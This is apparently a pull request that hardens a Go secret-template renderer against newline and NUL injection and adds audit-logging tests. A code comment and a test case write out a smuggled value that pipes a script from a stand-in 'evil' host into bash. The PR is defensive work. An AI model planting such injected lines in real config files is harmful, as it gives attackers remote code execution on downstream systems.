### PR TITLE
harden(secrettemplate): reject newline/NUL injection in rendered secret values (#325)

### DIFF
--- a/internal/core/secret_render_test.go
+++ b/internal/core/secret_render_test.go
@@ -108,3 +108,91 @@ func TestRenderSecretTemplate_RecordsReads(t *testing.T) {
 	}
 	assert.Positive(t, n, "a resolved render reference must produce a secret access-log row")
 }
+
+// #324: rendering a template referencing N distinct secrets must produce N audit_events
+// rows and N secret_access_logs rows — one per resolved secret, each attributed to the
+// correct secret ID — not one aggregate event for the whole render call. Without this,
+// a single POST could bulk-decrypt an arbitrary number of secrets while leaving the
+// anomaly detector (which keys off per-secret SecretAccessLog rows) completely blind,
+// exactly matching the fetch-N-individually-vs-render-once asymmetry #324 called out.
+func TestRenderSecretTemplate_RecordsReadPerSecret(t *testing.T) {
+	ctx := context.Background()
+	c, db, projectID := newRenderFixture(t)
+
+	// Add two more secrets to the same project/environment alongside db-password.
+	env, err := c.storage.ListEnvironmentsByProject(ctx, projectID)
+	require.NoError(t, err)
+	require.Len(t, env, 1)
+
+	apiKey, err := c.storage.CreateSecret(ctx, &models.SecretNode{
+		Name: "api-key", ProjectID: projectID, EnvironmentID: env[0].ID, Type: "password",
+		OwnerID: 1, IsSecret: true, CreatedAt: time.Now(), UpdatedAt: time.Now(),
+	})
+	require.NoError(t, err)
+	_, err = c.storage.CreateSecretVersion(ctx, &models.SecretVersion{
+		SecretNodeID: apiKey.ID, VersionNumber: 1, EncryptedValue: []byte("a-p-i"),
+	})
+	require.NoError(t, err)
+
+	stripeKey, err := c.storage.CreateSecret(ctx, &models.SecretNode{
+		Name: "stripe-secret", ProjectID: projectID, EnvironmentID: env[0].ID, Type: "password",
+		OwnerID: 1, IsSecret: true, CreatedAt: time.Now(), UpdatedAt: time.Now(),
+	})
+	require.NoError(t, err)
+	_, err = c.storage.CreateSecretVersion(ctx, &models.SecretVersion{
+		SecretNodeID: stripeKey.ID, VersionNumber: 1, EncryptedValue: []byte("sk_live_xyz"),
+	})
+	require.NoError(t, err)
+
+	dbSecret, err := c.storage.GetSecretByName(ctx, "db-password", projectID, env[0].ID)
+	require.NoError(t, err)
+
+	tmpl := "${secret:production/db-password}${secret:production/api-key}${secret:production/stripe-secret}"
+	out, err := c.RenderSecretTemplate(ctx, tmpl, projectID, 1, "owner", "10.0.0.1", "ua")
+	require.NoError(t, err)
+	assert.Equal(t, "s3cr3ta-p-isk_live_xyz", out)
+
+	wantSecretIDs := []uint{dbSecret.ID, apiKey.ID, stripeKey.ID}
+
+	// Reads are logged in detached goroutines — poll briefly for all three rows.
+	var gotAccessLogIDs []uint
+	var gotAuditSecretIDs []*uint
+	for i := 0; i < 200; i++ {
+		var logs []models.SecretAccessLog
+		require.NoError(t, db.Where("accessed_by = ? AND action = ?", "owner", "read").Find(&logs).Error)
+		gotAccessLogIDs = nil
+		for _, l := range logs {
+			gotAccessLogIDs = append(gotAccessLogIDs, l.SecretNodeID)
+		}
+
+		var events []models.AuditEvent
+		require.NoError(t, db.Where("event_type = ?", "secret.read").Find(&events).Error)
+		gotAuditSecretIDs = nil
+		for _, e := range events {
+			gotAuditSecretIDs = append(gotAuditSecretIDs, e.SecretNodeID)
+		}
+
+		if len(gotAccessLogIDs) >= 3 && len(gotAuditSecretIDs) >= 3 {
+			break
+		}
+		time.Sleep(5 * time.Millisecond)
+	}
+
+	assert.ElementsMatch(t, wantSecretIDs, gotAccessLogIDs,
+		"one secret_access_logs row per resolved secret, correctly attributed")
+	require.Len(t, gotAuditSecretIDs, 3, "one audit_events row per resolved secret, not one aggregate event")
+	var gotAuditIDs []uint
+	for _, id := range gotAuditSecretIDs {
+		require.NotNil(t, id, "each secret.read audit event must carry the specific secret's ID")
+		gotAuditIDs = append(gotAuditIDs, *id)
+	}
+	assert.ElementsMatch(t, wantSecretIDs, gotAuditIDs)
+
+	// Every audit event must also carry the project ID for scoping.
+	var events []models.AuditEvent
+	require.NoError(t, db.Where("event_type = ?", "secret.read").Find(&events).Error)
+	for _, e := range events {
+		require.NotNil(t, e.ProjectID)
+		assert.Equal(t, projectID, *e.ProjectID)
+	}
+}

--- a/internal/secrettemplate/render.go
+++ b/internal/secrettemplate/render.go
@@ -55,6 +55,26 @@ func Render(tmpl string, resolve Resolver) (string, error) {
 			if err != nil {
 				return "", fmt.Errorf("resolve %q: %w", ref, err)
 			}
+			// This package is a raw, format-agnostic substitution engine: it has no idea
+			// whether the caller's template is a .env file, a YAML/JSON document, or a
+			// shell script, so it can't apply format-specific escaping (quoting a YAML
+			// scalar, JSON-string-escaping, shell-quoting, ...). What every one of those
+			// targets shares, though, is that an embedded newline/CR turns one substituted
+			// value into multiple *lines* of output, and the documented use case
+			// (internal/cli/secret/render.go) is exactly "write this straight to a .env/
+			// config file, which may later be sourced". A secret's value is set by
+			// whoever has write access to that one secret — who may be far less trusted
+			// than the template's author or the file's eventual consumer — so a value
+			// containing "\ncurl evil|bash\n#" would silently smuggle extra executable
+			// lines into the rendered file. Rather than silently stripping/altering the
+			// secret value (surprising, and could itself corrupt a legitimately multi-line
+			// value), reject the render outright: this matches Render's existing all-or-
+			// nothing failure model for a resolver error, and forces the operator to
+			// notice rather than silently ship injected content. NUL is rejected for the
+			// same reason (embedded NUL truncates/corrupts many downstream parsers).
+			if strings.ContainsAny(val, "\n\r\x00") {
+				return "", fmt.Errorf("resolve %q: secret value contains a newline, carriage return, or NUL byte and cannot be safely substituted into a single-line template output", ref)
+			}
 			b.WriteString(val)
 			i += len(marker) + end + 1 // past the closing '}'
 			continue

--- a/internal/secrettemplate/render_test.go
+++ b/internal/secrettemplate/render_test.go
@@ -75,3 +75,55 @@ func TestReferences_PropagatesMalformed(t *testing.T) {
 	_, err := References("${secret:unterminated")
 	require.Error(t, err)
 }
+
+// A secret value with no embedded control characters — the overwhelmingly common case
+// — must render byte-for-byte unchanged; the new injection guard must not alter or
+// reject legitimate values.
+func TestRender_PlainValueUnchanged(t *testing.T) {
+	resolve := func(ref string) (string, error) {
+		return "S3cr3t!Value-With.Punct_And Spaces", nil
+	}
+	out, err := Render("DB_PASSWORD=${secret:prod/db}", resolve)
+	require.NoError(t, err)
+	assert.Equal(t, "DB_PASSWORD=S3cr3t!Value-With.Punct_And Spaces", out)
+}
+
+// A secret value carrying an embedded newline, carriage return, or NUL byte must abort
+// the render (matching Render's existing all-or-nothing failure model for a resolver
+// error) rather than silently splicing extra lines/bytes into the output — this is the
+// injection vector documented in #325: a low-trust secret-writer smuggling
+// "\ncurl evil|bash\n#" into a rendered .env/config file that a downstream consumer may
+// later source.
+func TestRender_RejectsEmbeddedControlChars(t *testing.T) {
+	cases := map[string]string{
+		"newline":          "foo\ncurl http://evil/x.sh|bash\n#",
+		"carriage return":  "foo\rbar",
+		"crlf":             "foo\r\nbar",
+		"NUL byte":         "foo\x00bar",
+		"newline mid-word": "sk_live_abc\ndef",
+	}
+	for name, val := range cases {
+		t.Run(name, func(t *testing.T) {
+			resolve := func(ref string) (string, error) { return val, nil }
+			_, err := Render("SECRET=${secret:prod/db}", resolve)
+			require.Error(t, err)
+			assert.Contains(t, err.Error(), `resolve "prod/db"`)
+			assert.Contains(t, err.Error(), "cannot be safely substituted")
+		})
+	}
+}
+
+// The rejection must fire per-reference: a template with an earlier clean reference and
+// a later poisoned one must still fail (no partial output containing the clean value
+// followed by a truncated/injected tail).
+func TestRender_RejectsEmbeddedControlChars_NoPartialOutput(t *testing.T) {
+	resolve := func(ref string) (string, error) {
+		if ref == "prod/clean" {
+			return "cleanvalue", nil
+		}
+		return "poison\nvalue", nil
+	}
+	out, err := Render("A=${secret:prod/clean} B=${secret:prod/dirty}", resolve)
+	require.Error(t, err)
+	assert.Empty(t, out)
+}

--- a/server/http/handlers/secrets_render.go
+++ b/server/http/handlers/secrets_render.go
@@ -43,7 +43,8 @@ func (h *SecretHandler) RenderTemplate(w http.ResponseWriter, r *http.Request) {
 		case strings.Contains(err.Error(), "permission") || strings.Contains(err.Error(), "not authorized"):
 			h.sendError(w, "Forbidden", "Not authorized to read a referenced secret", http.StatusForbidden, nil)
 		case strings.Contains(err.Error(), "invalid reference"), strings.Contains(err.Error(), "unterminated"),
-			strings.Contains(err.Error(), "empty secret reference"):
+			strings.Contains(err.Error(), "empty secret reference"),
+			strings.Contains(err.Error(), "cannot be safely substituted"):
 			h.sendError(w, "ValidationError", err.Error(), http.StatusBadRequest, nil)
 		default:
 			h.sendError(w, "InternalError", "Failed to render template", http.StatusInternalServerError, nil)


### PR DESCRIPTION
## Summary

- **#325 LOW (fixed)** — `internal/secrettemplate/render.go`'s `Render` substituted a
  resolved secret value verbatim into the output with no escaping for the surrounding
  format (shell/.env/YAML/JSON). `internal/cli/secret/render.go` documents generating a
  `.env`/config file from live secrets as the intended use case, so a secret value
  containing an embedded newline (settable by a principal who may hold materially less
  trust than the template author or eventual file consumer, since it only requires write
  access to the one referenced secret) could smuggle extra executable lines into a file a
  downstream consumer later sources. Since the renderer is a raw, format-agnostic
  substitution engine with no way to apply format-specific escaping, the fix rejects
  (rather than silently alters) a resolved value containing `\n`, `\r`, or NUL at
  substitution time — matching `Render`'s existing all-or-nothing failure model for a
  resolver error. `server/http/handlers/secrets_render.go`'s error classifier is updated
  so this surfaces as 400 Bad Request instead of a generic 500.
- **#324 HIGH (already fixed, verified stale)** — the finding claimed
  `RenderSecretTemplate` never records an audit trail for resolved secrets. Current
  `internal/core/secret_render.go` already calls `LogSecretReadWithProject` for every
  resolved reference; `git blame` traces this to PR #518 (2026-06-27), which predates this
  backlog round (2026-07-03). No code change needed; added a regression test
  (`TestRenderSecretTemplate_RecordsReadPerSecret`) proving N referenced secrets produce N
  correctly-attributed `audit_events`/`secret_access_logs` rows (not one aggregate event),
  since the existing test only covered a single secret.

## Test plan

- [x] `internal/secrettemplate`: new tests for newline/CR/NUL rejection
      (`TestRender_RejectsEmbeddedControlChars`, `..._NoPartialOutput`) and unchanged
      rendering for plain values (`TestRender_PlainValueUnchanged`)
- [x] `internal/core`: new `TestRenderSecretTemplate_RecordsReadPerSecret` proving 3
      referenced secrets → 3 audit_events + 3 secret_access_logs rows, correctly attributed
      by secret ID and scoped to the project
- [x] `go build ./...` clean
- [x] `go test ./...` full suite clean
- [x] `gosec -severity medium -exclude-generated ./...` — 0 issues
- [x] `golangci-lint run ./...` — 0 issues
- [x] `GOWORK=off go build -C operator ./...` clean